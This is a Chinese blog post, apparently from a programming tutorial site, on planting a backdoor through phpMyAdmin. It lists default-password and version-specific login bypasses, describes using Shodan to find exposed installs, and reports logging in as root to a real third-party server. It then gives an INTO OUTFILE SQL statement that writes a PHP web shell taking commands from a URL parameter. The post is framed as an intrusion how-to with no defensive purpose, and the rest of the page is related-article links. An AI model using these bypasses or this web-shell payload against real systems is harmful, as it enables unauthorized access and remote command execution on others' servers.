phpMyAdmin通过密码漏洞留后门文件


Posted in PHP onNovember 20, 2018
  • 默认 phpMyAdmin:用户名 root 密码 root 或空登陆。
  • 版本 2.11.3~2.11.4:用户名 'localhost'@'@" 登陆,无需密码。
  • 版本 2.11.9.2:用户名 root 登陆,无需密码。

经测试,第二个漏洞在 phpMyAdmin 3.5.1 版本也是可行的。原理从略。

下面让我们简单的上网看看能不能找到一些存在这样漏洞的登陆页面。

祭出著名的漏洞搜索引擎 Shodan 并搜索 phpMyAdmin。

phpMyAdmin

phpMyAdmin通过密码漏洞留后门文件

先看看有没有不需要密码登陆的,逐一尝试没有后寻找名字中包含的版本号。这里我找到一个国内的(浙江省·杭州市)。

phpMyAdmin通过密码漏洞留后门文件

地址已手动打码。

http://121.***.*.219:80/

phpMyAdmin通过密码漏洞留后门文件

登陆成功(root 权限)。

phpMyAdmin通过密码漏洞留后门文件

接下来你可以写一个 outfile 到对方主机的网络目录下。俗称 “留后门”。

SELECT "<?php system($_GET[‘cmd']); ?>" into outfile "后门文件的绝对路径"

点击运行,不出意外便在对方主机留下了一个名为 runme.php 的后门文件。

总结

以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,谢谢大家对三水点靠木的支持。如果你想了解更多相关内容请查看下面相关链接

PHP 相关文章推荐
用libtemplate实现静态网页生成
Oct 09 PHP
PHP查询MySQL大量数据的时候内存占用分析
Jul 22 PHP
配置php网页显示各种语法错误
Sep 23 PHP
单点登录 Ucenter示例分析
Oct 29 PHP
ThinkPHP3.2.3实现分页的方法详解
Jun 03 PHP
PHP设置images目录不充许http访问的方法
Nov 01 PHP
ThinkPHP3.2框架使用addAll()批量插入数据的方法
Mar 16 PHP
php中请求url的五种方法总结
Jul 13 PHP
PHP实现简单计算器小程序
Aug 28 PHP
通过PHP设置BugFree获取邮箱通知
Apr 25 PHP
PHP实现基于状态的责任链审批模式详解
May 31 PHP
关于Anemometer图形化显示MySQL慢日志的工具搭建及使用的详细介绍
Jul 13 PHP
ThinkPHP5 的简单搭建和使用详解
Nov 15 #PHP
关于php unset对json_encode的影响详解
Nov 14 #PHP
PHP集成环境XAMPP的安装与配置
Nov 13 #PHP
python进程与线程小结实例分析
Nov 11 #PHP
PHP 获取客户端 IP 地址的方法实例代码
Nov 11 #PHP
如何优雅的使用 laravel 的 validator验证方法
Nov 11 #PHP
php使用curl模拟浏览器表单上传文件或者图片的方法
Nov 10 #PHP
You might like
IE6下focus与blur错乱的解决方案
2011/07/31 Javascript
js 验证身份证信息有效性
2014/03/28 Javascript
javascript 常见功能汇总
2015/06/11 Javascript
JavaScript实现动态添加,删除行的方法实例详解
2015/07/02 Javascript
javascript实现数组内值索引随机化及创建随机数组的方法
2015/08/10 Javascript
jquery+正则实现统一的表单验证
2015/09/20 Javascript
javascript实现动态统计图开发实例
2015/11/21 Javascript
Jqgrid之强大的表格插件应用
2015/12/02 Javascript
angularjs实现文字上下无缝滚动特效代码
2016/09/04 Javascript
AngularJS递归指令实现Tree View效果示例
2016/11/07 Javascript
js实现图片切换(动画版)
2016/12/25 Javascript
HTML5+Canvas调用手机拍照功能实现图片上传(下)
2017/04/21 Javascript
webpack实现热加载自动刷新的方法
2017/07/30 Javascript
关于axios如何全局注册浅析
2018/01/14 Javascript
通过jquery获取上传文件名称、类型和大小的实现代码
2018/04/19 jQuery
bootstrap动态调用select下拉框的实例代码
2018/08/09 Javascript
VUE实现可随意拖动的弹窗组件
2018/09/25 Javascript
react-router4按需加载(踩坑填坑)
2019/01/06 Javascript
vue.js指令v-for使用以及下标索引的获取
2019/01/31 Javascript
[52:29]DOTA2上海特级锦标赛主赛事日 - 2 胜者组第一轮#3Secret VS OG第三局
2016/03/03 DOTA
[47:04]LGD vs infamous Supermajor小组赛D组 BO3 第二场 6.3
2018/06/04 DOTA
详解如何用OpenCV + Python 实现人脸识别
2017/10/20 Python
Python内置模块turtle绘图详解
2017/12/09 Python
Python3.5 处理文本txt,删除不需要的行方法
2018/12/10 Python
音频处理 windows10下python三方库librosa安装教程
2020/06/20 Python
python中的垃圾回收(GC)机制
2020/09/21 Python
日本最大的旅游网站:Rakuten Travel(乐天旅游)
2018/08/02 全球购物
会计学专业自荐信
2014/06/25 职场文书
相亲活动方案
2014/08/26 职场文书
五心教育心得体会
2014/09/04 职场文书
2014年高校辅导员工作总结
2014/12/09 职场文书
2015年爱牙日活动总结
2015/02/05 职场文书
惹女朋友生气检讨书
2015/05/06 职场文书
重温入党誓词主持词
2015/06/29 职场文书
全民创业工作总结
2015/08/13 职场文书
2016幼儿园教师年度考核评语
2015/12/01 职场文书